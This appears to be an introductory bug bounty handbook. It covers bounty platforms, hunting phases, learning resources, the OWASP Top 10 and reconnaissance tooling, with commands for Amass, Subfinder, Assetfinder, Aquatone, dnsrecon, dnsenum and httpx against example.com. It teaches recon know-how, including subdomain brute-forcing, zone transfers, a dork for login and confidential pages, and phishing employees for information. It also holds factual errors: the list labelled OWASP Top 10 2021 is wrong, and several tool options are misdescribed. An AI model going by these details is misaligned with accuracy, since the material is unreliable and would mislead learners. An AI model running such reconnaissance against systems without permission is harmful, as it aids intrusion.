# Little Bug Bounty Book

Version 1.0

Follow me:\
<https://www.github.com/halencarjunior>\
<https://www.twitter.com/bt0s3c>

Take a look at my BugBuntu Project:\
<https://github.com/halencarjunior/BugBuntu>&#x20;

If you keep wanting me to write something about that subject, Buy me a Coffee<br>

<https://buymeacoffee.com/halencarjunior>

<figure><img src="https://4139606766-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F2Clpj5NNgy3m0M7WnVOl%2Fuploads%2F38Pp87ezJcOQz6WcgsaC%2Fbug-hunting.png?alt=media&amp;token=0ab0ec37-3845-4c5e-a93b-2708b7c0ad93" alt=""><figcaption></figcaption></figure>


# What is Bug Bounty

A brief definition of Bug Bounty

Bug bounty refers to a program offered by many websites, software developers, and tech companies in which individuals are incentivized to report security vulnerabilities found in their platforms. A bug bounty program aims to identify and fix security flaws in a website, application, or software before they can be exploited by malicious actors.

### Why do companies look for Bug Hunters through those programs?

1. Enhanced Security: The primary reason for offering bug bounties is to improve the security of the company's platforms. By incentivizing individuals to find and report security vulnerabilities, companies can identify and fix these issues before malicious actors exploit them.
2. Cost-effective: Bug bounties can be a cost-effective way for companies to find and fix security vulnerabilities. Hiring a full-time security team can be expensive, and external security auditors can also be costly. With a bug bounty program, companies can tap into a global network of security researchers and only pay for the vulnerabilities found.
3. Improved Reputation: Companies that run bug bounty programs are viewed as proactive in their approach to security and are often seen as more trustworthy by consumers and partners.
4. Broader Testing Coverage: By opening up security testing to a wider audience, companies can benefit from a more diverse pool of testers, who may find security flaws that would have gone undetected by in-house security teams.


# Bug Bounty Platforms

Here is a list of the most used platforms for Bug Hunting

These platforms provide a way for organizations to run bug bounty programs, manage security testing, and find and fix security vulnerabilities. They offer a cost-effective way for companies to enhance their security posture and benefit from the expertise of a global network of security researchers.

1. HackerOne: HackerOne is a leading bug bounty platform that connects organizations with a global network of security researchers. Companies can launch private or public bug bounty programs on HackerOne to find and fix security vulnerabilities. (<https://www.hackerone.com/>)
2. Bugcrowd: Bugcrowd is another popular bug bounty platform that enables organizations to manage their security testing and vulnerability management. Companies can launch custom bug bounty programs on Bugcrowd to find and fix security vulnerabilities. (<https://www.bugcrowd.com/>)
3. Synack: Synack is a managed security services provider that offers a platform for bug bounty programs. Companies can use Synack to launch private or public bug bounty programs and benefit from the expertise of a global network of security researchers. (<https://www.synack.com/>)
4. Zerodium: Zerodium is a vulnerability acquisition platform that pays bounties for previously unknown security vulnerabilities in popular software and platforms. (<https://zerodium.com/>)
5. HackerRank is a technology company that provides a platform for technical skill assessments and coding challenges. In addition to its main offering, HackerRank also operates a bug bounty program where individuals can earn rewards for reporting security vulnerabilities. (<https://www.hackerrank.com/>)
6. Intigriti is another popular bug bounty platform that connects organizations with a global network of security researchers. Companies can launch bug bounty programs on Intigriti to find and fix security vulnerabilities. Intigriti offers a range of tools and services to help companies manage their security testing and vulnerability management effectively. (<https://www.intigriti.com/>)


# Phases of Bug Hunting

The phases of bug hunting typically involve the following steps:

1. Reconnaissance: In this phase, the bug hunter gathers information about the target website or application, such as its structure, technologies used, and any known vulnerabilities.
2. Scanning: In this phase, the bug hunter uses automated tools to identify potential security vulnerabilities in the target website or application.
3. Testing: In this phase, the bug hunter manually tests the identified potential security vulnerabilities to confirm their existence and assess their severity.
4. Reporting: In this phase, the bug hunter reports the confirmed security vulnerability to the organization, including details on how it can be exploited and how it can be fixed.
5. Verification: In this phase, the organization verifies the reported security vulnerability and works to fix it.
6. Reward: In this phase, the bug hunter is rewarded for their efforts, typically in the form of money, swag, or recognition.

All those phases are repeated as needed until all known security vulnerabilities have been identified and fixed.


# Required Knowledge

A bug hunter should have a combination of technical and soft skills, including:

1. Technical knowledge: Bug hunters should have a strong understanding of web technologies, programming languages, and computer systems. They should also have knowledge of security concepts, such as common vulnerabilities and exploits, and be familiar with security tools and methodologies.
2. Problem-solving skills: Bug hunters should have strong problem-solving skills and be able to think creatively to identify and exploit security vulnerabilities.
3. Attention to detail: Bug hunting requires meticulous attention to detail, as even small errors can result in false positives or missed vulnerabilities.
4. Communication skills: Bug hunters should be able to clearly and concisely communicate the details of a security vulnerability, including how it can be exploited and how it can be fixed.
5. Ethical hacking: Bug hunting requires a strong sense of ethics, as the goal is to identify and report security vulnerabilities, not to exploit them for malicious purposes. Bug hunters should have a deep understanding of the principles of responsible disclosure and follow ethical hacking practices.

*A successful bug hunter should have a combination of technical expertise, problem-solving skills, attention to detail, communication skills, and a strong sense of ethics.*


# So, where do I start?

There are many resources available for learning about bug hunting and acquiring the skills needed to be a successful bug hunter. Here are some places to start:

1. Online courses and tutorials: Online learning platforms like Udemy, Coursera, and Udacity offer a variety of courses on web security and ethical hacking, which can provide a solid foundation for bug hunting.
2. Books and publications: There are many books and publications available that cover the topic of bug hunting and web security, including "Web Hacking 101" by Peter Yaworski, "The Web Application Hacker's Handbook" by Dafydd Stuttard, and "Black Hat Python" by Justin Seitz.
3. Hacker conferences and workshops: Attending hacker conferences and workshops can provide an opportunity to learn from experienced bug hunters and security experts. Conferences like Black Hat and Def Con are popular events for security researchers and bug hunters.
4. Participating in bug bounty programs: Participating in bug bounty programs is a great way to gain hands-on experience and learn from other bug hunters. Many organizations have bug bounty programs that allow individuals to submit security vulnerabilities and receive rewards for their efforts.
5. Online forums and communities: Online forums and communities, such as Reddit's "netsec" community and the OWASP community, provide a platform for discussing security topics and exchanging ideas and knowledge with other security researchers and bug hunters.

The list of resources above can help you acquire the knowledge and skills needed to become a successful bug hunter. It's important to keep in mind that bug hunting is an ongoing process and that you should continuously learn and improve your skills over time.


# Network Security

Where do I start learning network security:

1. Books and publications: There are many books and publications available that cover the topic of network security, including "Networking All-in-One For Dummies" by Doug Lowe, "Computer Networking: A Top-Down Approach" by James F. Kurose and Keith W. Ross, and "Firewalls and Internet Security: Repelling the Wily Hacker" by William R. Cheswick and Steven M. Bellovin.
2. Conferences and workshops: Attending security conferences and workshops can provide an opportunity to learn from experienced security professionals and network with others in the field. Conferences like Black Hat, Def Con, and RSA are popular events for security professionals.
3. Certifications: Pursuing network security certifications, such as CompTIA Security+ and Certified Ethical Hacker (CEH), can help demonstrate your knowledge and skills in the field and make you a more competitive job candidate.
4. Practice: Practical experience is essential to learning about network security. You can gain hands-on experience by setting up a lab environment and experimenting with different security tools and techniques. You can also participate in capture the flag (CTF) events or ethical hacking competitions to put your skills to the test.
5. Online forums and communities: Online forums and communities, such as Reddit's "netsec" community and the SANS community, provide a platform for discussing security topics and exchanging ideas and knowledge with other security professionals.


# Application Security

To start learning about Application Security, you could use the below suggestions:

1. Books and publications: There are many books and publications available that cover the topic of application security, including "The Web Application Hacker's Handbook" by Dafydd Stuttard and Marcus Pinto, "Secure Coding in C and C++" by Robert C. Seacord, and "OWASP Top 10 Web Application Security Risks."
2. Conferences and workshops: Attending security conferences and workshops can provide an opportunity to learn from experienced security professionals and network with others in the field. Conferences like Black Hat, Def Con, and BSides are popular events for security professionals.
3. Certifications: Pursuing application security certifications, such as Certified Secure Software Lifecycle Professional (CSSLP) and Certified Application Security Engineer (CASE), can help demonstrate your knowledge and skills in the field and make you a more competitive job candidate.
4. Practice: Practical experience is essential to learning about application security. You can gain hands-on experience by setting up a lab environment and experimenting with different security tools and techniques, such as static code analysis and dynamic testing.
5. Online forums and communities: Online forums and communities, such as the OWASP community and Reddit's "netsec" community, provide a platform for discussing security topics and exchanging ideas and knowledge with other security professionals.
6. Bug bounty programs: Participating in bug bounty programs can provide hands-on experience with finding and reporting security vulnerabilities in real-world applications.

These resources can help you acquire the knowledge and skills needed to become proficient in application security. It's important to keep in mind that application security is a constantly evolving field, and it's essential to continuously learn and stay up-to-date with the latest developments and best practices.


# Mobile Security

Where to start learning about Mobile Security?

1. OWASP Mobile Security Project: The OWASP Mobile Security Project is a comprehensive resource for learning about mobile application security. It includes guides, tools, and information on how to secure mobile applications and how to test for vulnerabilities. (<https://owasp.org/www-project-mobile-app-security/>)
2. Mobile Application Hacker's Handbook: This book provides a comprehensive overview of mobile application security and the different types of attacks that can be used to exploit vulnerabilities in mobile applications.
3. Android Security and Privacy Bootcamp: This bootcamp provides a comprehensive introduction to the security and privacy features of the Android operating system, as well as how to develop secure Android applications.
4. iOS Security and Privacy Bootcamp: This bootcamp provides a comprehensive introduction to the security and privacy features of the iOS operating system, as well as how to develop secure iOS applications.
5. Mobile Security Challenges: This online course provides an overview of the security challenges associated with mobile devices and applications, and covers the latest techniques and tools used to secure them.
6. Mobile Pwn2Own: Mobile Pwn2Own is an annual competition that rewards researchers for discovering and responsibly disclosing vulnerabilities in mobile devices and applications.
7. Mobile App Security Testing: This online course provides a hands-on introduction to mobile app security testing, including how to identify and exploit vulnerabilities in mobile applications.

These resources can help you gain a deeper understanding of mobile security and the different types of threats and vulnerabilities that exist in the mobile landscape


# Code Review and SAST

Where to find resources about Code Review and SAST?

1. OWASP Code Review Project: The OWASP Code Review Project provides a comprehensive guide to code review, including best practices, methodologies, and tools.
2. Secure Code Warrior: Secure Code Warrior is an online platform that provides training and assessment on secure coding practices, including code review and SAST.
3. SANS Institute: The SANS Institute offers several courses on software security, including code review and SAST, taught by experienced security professionals.
4. Udemy: Udemy is an online learning platform that offers a variety of courses on software security, including code review and SAST.
5. Coursera: Coursera is another online learning platform that offers courses on software security, including code review and SAST.
6. Pluralsight: Pluralsight is an online learning platform that offers courses on software security, including code review and SAST.
7. Code Review Checklist: The Code Review Checklist is a comprehensive list of items to consider when reviewing code for security vulnerabilities, including best practices and guidelines for SAST.


# OWASP?

The Open Web Application Security Project (OWASP) is a non-profit organization that aims to improve the security of software applications by raising awareness and providing education, tools, and standards. OWASP is dedicated to providing free and open resources to the security community, and its projects and initiatives are run by volunteers from around the world.\
\
Link to the project: <https://owasp.org/>&#x20;

The OWASP Top 10 is a list of the 10 most critical web application security risks. It is a widely recognized and referenced list that provides guidance to organizations and individuals on the most important security risks they should focus on when developing or maintaining web applications. The OWASP Top 10 is updated approximately every three years to reflect changes in the threat landscape and evolving best practices.

The OWASP Top 10 risks for the current version (OWASP Top 10 - 2021) are:

1. Injection: Injection flaws, such as SQL injection, allow attackers to inject malicious code into a web application and execute it on the server.
2. Broken Access Control: Broken access control can occur when an application provides access to resources based on user-supplied data, such as a user ID, that is not properly validated.
3. Broken Authentication and Session Management: Broken authentication and session management can occur when an application does not properly protect authentication credentials or session identifiers, such as cookies, from theft or tampering.
4. XML External Entities (XXE): XXE attacks exploit vulnerabilities in the way XML parsers process external entity references in XML data.
5. Broken Cryptographic Storage: Broken cryptographic storage occurs when an application stores cryptographic keys or passwords in an insecure manner, such as storing them in plaintext.
6. Insufficient Logging & Monitoring: Insufficient logging and monitoring can make it difficult for organizations to detect and respond to security incidents in a timely manner.
7. Cross-Site Scripting (XSS): XSS attacks allow attackers to inject malicious scripts into web pages viewed by other users, which can be used to steal sensitive information or perform actions on behalf of the victim.
8. Using Components with Known Vulnerabilities: Using components with known vulnerabilities can put an application at risk, as attackers can exploit known vulnerabilities to gain access to sensitive information.
9. Insufficient Security Configurations: Insufficient security configurations can make it easier for attackers to exploit vulnerabilities in an application or its underlying systems.
10. Insufficient Encryption & Transport Layer Protection: Insufficient encryption and transport layer protection can expose sensitive information, such as passwords and credit card numbers, to eavesdropping or tampering.

The OWASP Top 10 provides a useful starting point for organizations and individuals looking to improve the security of their web applications. By focusing on these critical risks, organizations can better protect their applications and their users from the most common and damaging attacks.


# Reconnaissance Phase

How to start the recon phase

Reconnaissance is the first phase of a typical penetration testing or bug hunting process. It involves gathering information about the target domain, such as example.com, to identify potential attack surfaces and vulnerabilities. Here are some steps to start reconnaissance on the domain example.com:

1. Research the target: Start by researching the target domain, example.com, to gather as much information as possible about the company, its products, services, and technologies used.
2. Domain Enumeration: Use tools such as dig, nslookup, whois, and others to gather information about the domain name system (DNS) records for example.com. This can reveal subdomains, IP addresses, and other information about the target domain.
3. IP Scanning: Use tools such as Nmap to scan the IP addresses associated with example.com to identify open ports and running services. This information can help identify potential attack surfaces and entry points into the target network.
4. Web Application Analysis: Analyze the web applications hosted on example.com to identify potential vulnerabilities, such as cross-site scripting (XSS), SQL injection, and others. You can use tools such as Burp Suite, OWASP ZAP, or others to automate this process.
5. Social Engineering: Use social engineering techniques, such as phishing or baiting, to gather information about the target and its employees. This information can be used to gain access to sensitive systems or data.
6. Passive Information Gathering: Gather information about the target from publicly available sources, such as search engines, social media, and forums, to identify potential weaknesses and entry points.

These steps can help you gather information about the target domain, example.com, and identify potential vulnerabilities that can be exploited in the next phases of a penetration testing or bug hunting engagement. It is important to remember that reconnaissance should be conducted in a legal and ethical manner, and with the permission of the target domain's owner.


# Footprinting

Footprinting is the first phase of a penetration testing engagement. It is the process of gathering information about the target system, network, or organization. The goal of footprinting is to gain a comprehensive understanding of the target, identify potential vulnerabilities, and create a plan for further testing.

Footprinting can involve a variety of techniques, including:

1. Open-source intelligence (OSINT) gathering: This involves using publicly available information to learn more about the target. This can include researching the target's website, social media profiles, and other online resources.
2. Network footprinting: This involves mapping out the target's network, identifying active hosts and their open ports, and determining the target's IP address space and subnets.
3. Website footprinting: This involves analyzing the target's website to gather information such as the web server type and version, the technologies used, and any directories and files that may be accessible.
4. Whois and DNS record analysis: This involves gathering information about the domain name, registrar, and DNS servers associated with the target.

Footprinting is an important step in a penetration testing engagement because it provides the tester with a baseline understanding of the target's infrastructure and potential attack vectors. This information can be used to tailor the subsequent phases of the engagement, including vulnerability assessment and exploitation.

### Passive Reconnaissance

Passive reconnaissance is a technique used in the enumeration phase of a penetration testing or ethical hacking process to gather information about a target system or network without actively interacting with it. The objective of passive reconnaissance is to gather the information that is readily available and publicly accessible, such as information from websites, social media, and public records.

The advantage of passive reconnaissance is that it is less likely to raise suspicion or trigger any security alerts compared to active reconnaissance, which involves actively interacting with the target system. Passive reconnaissance is often used as the first step in the enumeration phase, to gather basic information about the target and to lay the foundation for further active reconnaissance.

Examples of passive reconnaissance techniques include:

* Search engine reconnaissance: Using search engines such as Google, Bing, or Shodan to search for information about the target.
* Social media reconnaissance: Analyzing social media profiles and posts of employees or the target organization to gather information about their technologies, networks, and security policies.
* DNS reconnaissance: Examining the target's DNS records to identify subdomains and IP addresses associated with the target.
* Whois lookup: Querying the Whois database to gather information about the target's domain registration and contact information.

Overall, passive reconnaissance is a valuable technique in the enumeration phase, as it provides a non-intrusive way to gather the information that can be used to better understand the target and plan the next steps in the testing or hacking process.


# OSINT

OSINT (Open-Source Intelligence) gathering is an important part of the footprinting phase of a penetration testing engagement. Here are some steps you can follow to perform OSINT gathering:

1. Research the target's website: Start by reviewing the target's official website, looking for information about the company's history, products, services, and other relevant details.
2. Check social media profiles: Look for the target's presence on popular social media platforms such as LinkedIn, Twitter, and Facebook. Look for information about the company's employees, customers, and partners.
3. Search online databases: Use online databases such as D\&B Hoovers, Crunchbase, and Glassdoor to gather more information about the target.
4. Check for news articles: Use Google News or other news search engines to find articles related to the target. This can provide insight into the target's recent activities, vulnerabilities, and other relevant information.
5. Use search engines: Use Google and other search engines to perform a comprehensive search for information about the target. Use advanced search techniques such as site:domain.com, intitle:keyword, and intext:keyword to refine your search results.
6. Check domain registration information: Use tools such as Whois Lookup to gather information about the target's domain name, registrar, and DNS servers.
7. Monitor forums and message boards: Look for information about the target on forums, message boards, and other online communities.
8. Check for leaked data: Use data breach search engines such as Have I Been Pwned to check if the target has suffered a data breach in the past.

By following these steps, you should be able to gather a significant amount of information about the target, which can be used to plan the subsequent phases of the penetration testing engagement.

<br>


# Google Dorks

Google dorks, also known as Google hacking, is a technique used to search for vulnerabilities in websites and applications by using specific search queries in the Google search engine. Here are the steps to use Google dorks for enumeration on the domain "example.com":

1. Start by identifying the target domain: In this case, the target domain is "example.com".
2. Formulate a Google search query: The query should be crafted in such a way that it returns relevant information about the target domain. For example, the following query can be used to search for sensitive information such as login pages, email addresses, and confidential documents related to the domain "example.com":

site:example.com intitle:"login" OR intitle:"email" OR intitle:"restricted" OR intitle:"confidential"

3. Execute the search query: Go to Google and paste the query in the search bar, then press "Enter" to execute the search.
4. Analyze the results: Review the results of the search query and look for any relevant information that can be used for enumeration. Some of the information you can find includes login pages, email addresses, and confidential documents related to the target domain.
5. Repeat the process: Repeat the above steps and formulate different search queries to find more information about the target domain.

You can find more examples of dorks on the link below:

<https://www.exploit-db.com/google-hacking-database>


# Censys

Censys is a search engine that allows you to find and explore internet-connected devices and the services they host. Here are the steps to use Censys for reconnaissance of the domain "example.com" endpoints and hosts:

URL: <https://censys.io/>

1. Create an account: Visit the Censys website and create an account to gain access to the search engine.
2. Search for the target domain: Once you have logged in, you can use the search bar to search for the target domain. For example, you can search for "example.com" to find all the endpoints and hosts associated with the domain.
3. Analyze the results: Review the results of the search and look for any relevant information about the target domain. Censys will provide information about the IP addresses, protocols, and ports associated with the domain, along with any SSL/TLS certificates and other information that might be useful for reconnaissance.
4. Filter the results: You can use the filters available in Censys to narrow down the search results and find specific information. For example, you can filter the results by port, protocol, or certificate information to focus on specific types of endpoints and hosts.
5. Repeat the process: Repeat the above steps and search for different keywords related to the target domain to find more information about the endpoints and hosts associated with the domain.


# Shodan

Shodan is a search engine for internet-connected devices that allows you to find and explore devices and the services they host. Here are the steps to use Shodan for reconnaissance of the domain "example.com" endpoints and hosts:\
\
URL: <https://www.shodan.io>

1. Create an account: Visit the Shodan website and create an account to gain access to the search engine.
2. Search for the target domain: Once you have logged in, you can use the search bar to search for the target domain. For example, you can search for "example.com" to find all the endpoints and hosts associated with the domain.
3. Analyze the results: Review the results of the search and look for any relevant information about the target domain. Shodan will provide information about the IP addresses, protocols, and ports associated with the domain, along with any software and hardware information that might be useful for reconnaissance.
4. Filter the results: You can use the filters available in Shodan to narrow down the search results and find specific information. For example, you can filter the results by port, protocol, or operating system to focus on specific types of endpoints and hosts.
5. Repeat the process: Repeat the above steps and search for different keywords related to the target domain to find more information about the endpoints and hosts associated with the domain.


# Subdomain Enumeration

the process of discovering and mapping all the subdomains associated with a particular domain. This information can be useful for security professionals in identifying potential attack surfaces and vulnerable areas within a target domain.

In subdomain enumeration, various tools are used to identify the subdomains of a domain by querying its domain name system (DNS) records. The DNS records reveal information about the subdomains and IP addresses associated with the target domain, including any subdomains that might have been missed during a regular port scan.

Subdomain enumeration is an important aspect of reconnaissance, as it can provide insight into the target's internal structure, identifying potential vulnerabilities and access points that might not be visible on the surface. This information can then be used in later stages of penetration testing or bug-hunting engagement to plan and execute attacks on the target.

It is important to conduct subdomain enumeration in a legal and ethical manner, and with the permission of the target domain's owner.


# Amass

### Installing Amass

Amass is an open-source tool that can be installed on various operating systems. The installation process may vary depending on the operating system you are using, but you can find the instructions on how to install Amass on the official GitHub repository.

Here are the steps to install Amass on some common operating systems:

1. Install on Linux: To install Amass on a Linux system, follow these steps:

* Download the latest version of Amass from the official GitHub repository:

```bash
wget https://github.com/OWASP/Amass/releases/download/v3.13.3/amass_v3.13.3_linux_amd64.zip
```

* Unzip the downloaded file:

```bash
unzip amass_v3.13.3_linux_amd64.zip
```

* Move the Amass binary to a location in your PATH:

```bash
sudo mv amass /usr/local/bin/
```

2. Install on macOS: To install Amass on a macOS system, follow these steps:

* Download the latest version of Amass from the official GitHub repository:

```bash
curl -LO https://github.com/OWASP/Amass/releases/download/v3.13.3/amass_v3.13.3_darwin_amd64.zip
```

* Unzip the downloaded file:

```bash
unzip amass_v3.13.3_darwin_amd64.zip
```

* Move the Amass binary to a location in your PATH:

```bash
sudo mv amass /usr/local/bin/
```

3. Install on Windows: To install Amass on a Windows system, follow these steps:

* Download the latest version of Amass from the official GitHub repository:
* Unzip the downloaded file.
* Add the Amass binary to your PATH environment variable.

These steps should help you install Amass on your system. After installation, you can verify the installation by running the following command in a terminal or command prompt:

```powershell
amass version
```

This should display the version number of Amass that you have installed.

### Enumerating subdomains

To use Amass to enumerate subdomains on the example.com domain, you can follow these steps:

1. Install Amass: To use Amass, you will need to install it on your system. The installation process may vary depending on the operating system you are using, but you can find the instructions on how to install Amass on the official GitHub repository.
2. Run Amass: Once Amass is installed, open a terminal or command prompt and navigate to the directory where Amass is installed. To run Amass on the example.com domain, use the following command:

```batch
amass enum -d example.com
```

3. Analyze the output: Amass will begin enumerating subdomains for the example.com domain, and the results will be displayed in the terminal or command prompt. You can save the output to a file for further analysis by using the following command:

```batch
amass enum -d example.com -o example_subdomains.txt
```

4. Verify the results: Amass might not find all subdomains of a domain, so it is a good practice to verify the results by checking the DNS records of the target domain. You can use tools like dig, nslookup, or whois to verify the results.

### Bruteforcing subdomains

Amass can also be used to perform a subdomain brute force attack. This process involves attempting to discover subdomains by generating and testing a large number of potential subdomain names. To use Amass for brute force subdomain enumeration on the example.com domain, you can follow these steps:

1. Prepare a wordlist: A wordlist is a file that contains a list of potential subdomain names. You can use an existing wordlist or create a custom wordlist for the target domain. There are several online sources where you can find wordlists for various domains.
2. Run Amass: Open a terminal or command prompt and navigate to the directory where Amass is installed. To run a brute force attack on the example.com domain using the wordlist, use the following command:

```batch
amass brute -d example.com -w wordlist.txt
```

4. Analyze the output: Amass will begin brute forcing subdomains for the example.com domain using the wordlist, and the results will be displayed in the terminal or command prompt. You can save the output to a file for further analysis by using the following command:

```batch
amass brute -d example.com -w wordlist.txt -o example_subdomains.txt
```

5. Verify the results: As with any subdomain enumeration, it is important to verify the results by checking the DNS records of the target domain. You can use tools like dig, nslookup, or whois to verify the results.

Note that brute force attacks can be resource-intensive and can take a long time to complete, depending on the size of the wordlist and the number of potential subdomains. Also, it is important to conduct subdomain brute force attacks in a legal and ethical manner and with the permission of the target domain's owner.

### Information Gathering on example.com

Amass is a powerful tool that can be used for various reconnaissance tasks, including information gathering for a specific domain. To use Amass for intelligence on the domain "example.com", follow these steps:

1. Start Amass with the following command:

```bash
amass intel -src -d example.com
```

The `-src` option is used to enable source resolution, which means Amass will perform DNS resolution on each subdomain and will also attempt to identify the IP address of each host. The `-d` option is used to specify the target domain, which in this case is "example.com".

2. Wait for the Amass scan to complete. The amount of time it takes to complete the scan will depend on the number of subdomains, the sources being used, and the speed of your network connection.
3. Once the scan is complete, you will see a list of subdomains and IP addresses for the "example.com" domain. You can save this information to a file for further analysis by using the `-o` option:

```bash
amass intel -src -d example.com -o example_com_output.txt
```

This will create a file named "example\_com\_output.txt" in the current directory, containing the results of the Amass scan.

These are the basic steps for using Amass for intelligence gathering on a specific domain. You can find more information on the options available with Amass by running the following command:

```bash
amass intel -h
```

This will display the help information for the `intel` command, which includes a description of each option and how to use it.


# Subfinder

To install the Subfinder tool for subdomain enumeration, you need to have a basic understanding of the command line and some experience with using a terminal or command prompt.

Here are the steps to install Subfinder on a Linux or macOS system:

1. Install Go, if you don't have it already installed:

```bash
sudo apt-get install golang-go
```

2. Set up the GOPATH environment variable:

```bash
export GOPATH=$HOME/go
```

3. Install Subfinder:

```bash
go install github.com/projectdiscovery/subfinder/cmd/subfinder@latest
```

4. Once the installation is complete, you can run Subfinder from the terminal by typing:

```bash
subfinder
```

To install Subfinder on a Windows system, you will need to follow a similar process, but some of the commands and steps may be different.

Once Subfinder is installed, you can use it to perform subdomain enumeration on a target domain. For example, to enumerate subdomains for the domain "example.com", you can run the following command:

```bash
subfinder -d example.com
```

To perform a more complete subdomain enumeration on the domain "example.com" using Subfinder, you can use the following command:

```bash
subfinder -d example.com -all -silent -o example_com_output.txt
```

This command will enumerate all possible subdomains for the domain "example.com" using all of the available sources, and it will write the results to a file named "example\_com\_output.txt".

The `-all` option is used to tell Subfinder to use all available sources for subdomain enumeration, including passive sources such as the Alexa top 1 million websites, as well as active sources such as brute force and recon-ng.

The `-silent` option is used to suppress the output to the terminal, which can be useful when performing large-scale enumeration.

The `-o` option is used to specify the output file, which in this case is "example\_com\_output.txt".

Once the command is run, Subfinder will perform the subdomain enumeration, and the results will be saved to the specified output file. You can then review the file to see the list of subdomains for the domain "example.com".

These are the basic steps for performing an advanced subdomain enumeration using Subfinder. You can find more information on the options available with Subfinder by running the following command:

```bash
subfinder -h
```

This will display the help information for the tool, which includes a description of each option and how to use it.


# Assetfinder

Assetfinder is a subdomain enumeration tool that can be used to find subdomains for a given domain. To install Assetfinder, you need to have a basic understanding of the command line and some experience with using a terminal or command prompt.

Here are the steps to install Assetfinder on a Linux or macOS system:

1. Install Go, if you don't have it already installed:

```bash
sudo apt-get install golang-go
```

2. Set up the GOPATH environment variable:

```bash
export GOPATH=$HOME/go
```

3. Install Assetfinder:

```bash
go install github.com/tomnomnom/assetfinder@latest
```

4. Once the installation is complete, you can run Assetfinder from the terminal by typing:

```bash
assetfinder
```

To install Assetfinder on a Windows system, you will need to follow a similar process, but some of the commands and steps may be different.

Once Assetfinder is installed, you can use it to perform subdomain enumeration on a target domain. For example, to enumerate subdomains for the domain "example.com", you can run the following command:

```bash
assetfinder example.com
```

This will enumerate subdomains for the domain "example.com" using the sources specified in the tool's configuration file.

You can also combine the results of Assetfinder with other subdomain enumeration tools to get a more comprehensive list of subdomains. For example, you can pipe the output of Assetfinder into another tool, such as Aquatone, to perform screenshotting and HTML content analysis:

```bash
assetfinder example.com | aquatone
```

These are the basic steps for installing and using Assetfinder for subdomain enumeration. You can find more information on the options available with Assetfinder by running the following command:

```bash
assetfinder -h
```

This will display the help information for the tool, which includes a description of each option and how to use it.


# Aquatone

Aquatone is a tool for performing reconnaissance on web applications and websites. It can be used for subdomain enumeration, screenshotting, and HTML content analysis.

Here are the steps to install Aquatone on a Linux or macOS system:

1. Install Ruby, if you don't have it already installed:

```bash
sudo apt-get install ruby
```

2. Install Aquatone:

```bash
gem install aquatone
```

3. Once the installation is complete, you can run Aquatone from the terminal by typing:

```bash
aquatone
```

To install Aquatone on a Windows system, you will need to follow a similar process, but some of the commands and steps may be different.

Once Aquatone is installed, you can use it to perform subdomain enumeration and reconnaissance on a target domain. For example, to enumerate subdomains and perform screenshotting and HTML content analysis for the domain "example.com", you can run the following command:

```bash
aquatone-scan -d example.com
```

This will enumerate subdomains for the domain "example.com" using the sources specified in the tool's configuration file, and then perform screenshotting and HTML content analysis on each subdomain.

You can also combine the results of Aquatone with other subdomain enumeration tools to get a more comprehensive list of subdomains. For example, you can pipe the output of a subdomain enumeration tool, such as Assetfinder, into Aquatone to perform screenshotting and HTML content analysis:

```bash
assetfinder example.com | aquatone
```

These are the basic steps for installing and using Aquatone for subdomain enumeration and reconnaissance. You can find more information on the options available with Aquatone by running the following command:

```bash
aquatone -h
```

This will display the help information for the tool, which includes a description of each option and how to use it.


# DNSrecon

Dnsrecon is a tool for performing reconnaissance on DNS servers and domains. It can be used for subdomain enumeration, zone transfers, and other types of reconnaissance.

Here are the steps to install Dnsrecon on a Linux or macOS system:

1. Install Python, if you don't have it already installed:

```bash
sudo apt-get install python
```

2. Install Dnsrecon:

```bash
pip install dnsrecon
```

3. Once the installation is complete, you can run Dnsrecon from the terminal by typing:

```bash
dnsrecon
```

To install Dnsrecon on a Windows system, you will need to follow a similar process, but some of the commands and steps may be different.

Once Dnsrecon is installed, you can use it to perform subdomain enumeration and reconnaissance on a target domain. For example, to enumerate subdomains for the domain "example.com", you can run the following command:

```bash
dnsrecon -d example.com -t brt
```

This will perform a brute force subdomain enumeration for the domain "example.com" and display the results in the terminal.

You can also perform a zone transfer for the target domain to gather additional information about the subdomains and DNS server configuration. For example:

```bash
dnsrecon -d example.com -t zt
```

These are the basic steps for installing and using Dnsrecon for subdomain enumeration and DNS reconnaissance. You can find more information on the options available with Dnsrecon by running the following command:

```bash
dnsrecon -h
```

This will display the help information for the tool, which includes a description of each option and how to use it.


# DNSEnum

dnsenum is a tool used to perform DNS enumeration, which is the process of gathering information about a target domain's DNS records. Here are the steps to install and use dnsenum to perform a DNS enumeration on the domain "example.com":

Official Home Page: <https://github.com/SparrowOchon/dnsenum2>

1. Install dnsenum: dnsenum can be installed on most Linux distributions by using the package manager. For example, on Debian-based systems, you can install dnsenum using the following command:

```bash
sudo apt-get install dnsenum
```

2. Run dnsenum: To run dnsenum, open a terminal and enter the following command:

```bash
dnsenum example.com
```

This will start dnsenum and it will begin to gather information about the domain's DNS records. The results of the enumeration will be displayed in the terminal.

3. Analyze the results: The results of the DNS enumeration will include information about the target domain's DNS servers, hostnames, IP addresses, email servers, and more. You can use this information to gain a better understanding of the target domain's infrastructure and to identify potential vulnerabilities.

<figure><img src="https://4139606766-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F2Clpj5NNgy3m0M7WnVOl%2Fuploads%2FjytpqyogT5LfLhNQLuS3%2Fimage.png?alt=media&amp;token=283fcc41-54f2-4ec0-a97b-27edc246512c" alt=""><figcaption></figcaption></figure>


# HTTPX

Testing for online subdomains

`httpx` is a fast and multi-purpose HTTP toolkit that allows running multiple probes using the [retryablehttp](https://github.com/projectdiscovery/retryablehttp-go) library. It is designed to maintain result reliability with an increased number of threads.

Here are the steps to test all the enumerated subdomains from the domain "example.com" using the `httpx` tool:

1. First, you will need to have the `httpx` tool installed on your system. You can install it using the following command:

```bash
go install github.com/projectdiscovery/httpx/cmd/httpx@latest
```

2. Once `httpx` is installed, you can use it to test the enumerated subdomains. The basic syntax is:

```bash
httpx -threads 100 -l subdomains.txt -o httpx_output.txt
```

Where `subdomains.txt` is a file containing the list of subdomains, and `httpx_output.txt` is the output file that will contain the results of the scan. The `-threads` option specifies the number of concurrent requests that `httpx` will make.

3. To test all the enumerated subdomains from the "example.com" domain, you can use the following command:

```bash
httpx -threads 100 -l subdomains.txt -o httpx_output.txt -t 200 -m GET -follow-redirects -no-color
```

This will send a GET request to each subdomain and follow any redirects. The `-t` option specifies the timeout for each request and the `-no-color` option disables colored output.

